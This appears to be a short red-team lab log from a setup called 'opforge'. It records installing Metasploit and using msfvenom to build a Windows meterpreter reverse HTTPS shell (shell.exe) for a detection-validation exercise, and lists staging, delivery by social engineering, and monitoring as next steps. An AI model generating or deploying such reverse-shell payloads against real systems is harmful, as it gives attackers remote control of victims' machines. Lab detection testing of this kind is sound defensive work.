Metasploit Installed

Metasploit was installed using the official msfinstall script:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Confirmed with:

msfconsole --version

Payload Generation

The following payload was created for C2 operations within the DMZRED segment:

sudo msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=192.168.22.50 LPORT=8443 \
  -f exe -o shell.exe

Payload was moved to:

/opt/opforge/redteam/payloads/shell.exe

File properties:

file shell.exe
sha256sum shell.exe

The payload is now ready to be staged from OPF-RED01 or delivered via social engineering as part of a detection validation scenario.


Next Steps

  • Set up listener in msfconsole
  • Deploy payload to opf-mbr01
  • Monitor detection in opf-blue01, opf-ai01, or via Winlogbeat pipeline